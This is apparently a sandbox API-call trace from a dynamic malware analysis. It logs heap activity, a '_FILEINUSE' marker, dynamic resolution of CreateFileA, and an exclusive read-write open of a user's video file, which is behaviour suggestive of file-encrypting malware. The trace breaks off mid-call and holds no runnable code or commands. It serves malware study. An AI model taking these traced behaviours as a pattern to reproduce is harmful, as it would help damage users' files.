[0043.800] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.800] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.803] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.805] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cdd8 [0043.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cdd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.806] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdd8 [0043.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cdd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.806] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0043.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x48) returned 0x88e138 [0043.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", cchWideChar=72, lpMultiByteStr=0x88e138, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", lpUsedDefaultChar=0x0) returned 72 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.807] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\q6ltnsyyx sfrju.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0043.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=72, lpWideCharStr=0x7c3818, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv") returned 72 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 